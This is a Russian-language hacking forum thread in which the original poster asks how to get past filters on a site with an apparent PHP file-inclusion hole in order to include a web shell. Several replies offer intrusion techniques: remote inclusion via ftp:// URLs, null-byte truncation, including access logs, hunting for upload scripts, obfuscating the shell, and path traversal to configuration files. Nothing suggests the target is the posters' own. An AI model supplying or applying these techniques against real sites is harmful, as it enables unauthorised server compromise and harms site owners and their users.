Помогите с PHP Inj

Вообщем есть сайт такого вида:

_http://www.site.com/site.php?page=index

после рандомного текста вводимого вместо index, выдает следующее:

Code:

Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61

Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61

Fatal error: main() [function.require]: Failed opening required 'ggsdf.php' (include_path='.:/usr/local/lib/php') in /home/site/public_html/site.php on line 61

Но после подстановки шелла в адресной строке, выдает следующее:

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Как это можно обойти?

 

Попробуй указать вместо http://host/shell ссылку с фтп, т.е. - ftp://loginass@host/shell

Кстате если укажешь site вместо index, то возможно будет рекурсия =)

 

имхо будет то же самое что и при http
Просто такая фигня появляется из-за url file access
ТС, пробуй отбросить разширение с помощью нулл-байта и ищи скрипт для аплода файлов
Или пробуй инклудить ацес_лог - что не очень действенно =\

 

Да, аналогичная ситуация что и с http =\

%00 также не помогло =\

 

Spyder, если там url file access, то %00 там никак не поможет

 

Это ты ошибаешься, Spyder все правильно сказал, он говорил про локальный инклюд, а не ты не CraF непоняли про что он говорил

 

А да, извиняюсь, думал про %00 было сказано в тему про ремоут..ну да ладно)

 

Посмотрел, при добовление нулл байта такая же фигня происходит
имхо ничего не сделаеш
Если конечно сможешь залить как нибудь пшп файл, что вообще нереально =)

 

Странно, что при вписывании набора букв он выдает нормальную ошибку, а как инклюдишь шелл, то он пишет бред...у меня такое ощущение, что у них просто Iis там, антивирь или что-то подобное ловит шелл и просто не пускает его. ТС, попробуй проинклудить что-нить другое, или закрипти шелл.

 

гг, ИИС на никс сервере =)
Дело не в шелле. а в символах которые ты вводишь в строку
Попробуй перейти по ссылке site.php?%00 будет такая же фигня
Там просто фильтры стоят

 

Ааа...с ИИС тупанул =\ Не посмотрел что там путь есть)

Но мой вариант стоит попробовать, уже встречался с таким.

 

тут по крайней мере есть хсс

ты правильно шелл лепил? т.е. кидаешь, например на холм вида site.h17.ru/file, где на серваке уже подцепляется php, попробуй поискать файл конфига, т.е. если на сервере есть какой-нить бесплатный, или нет, борда, типа пхпбб, то попробуй вида http://site.com/../../config or http://site.com/../../config.inc нужно смотреть по ситуации, жаль локального не вытащишь. такс.

 

Гы... xss есть, там написано же что он выводит сообщугу об ошибке, xss - 'то само сабой, там фильтр идет на http:/ ftp:/ %00 в _REQUEST кто муже magic quotes on, кароче ничего сделать нельзя да и конфиги инклюдить бесполезно, это же инклюд а не читалка

 

омфг, Снейк, во первых Xss там нету, я проверил, во второх идёт фильтрация символов. Ты мой пост читал вообще?

 

блин. люди не тупите плз =) Там сразу идёт фильтраци на %00 и ftp:// http://
Scipio прав

 

я сказал на как думал и не тестил, ибо нет ссылки, а лучше выложить ссылку и не быть магами-чародеями-предсказателями. ссылку в студию!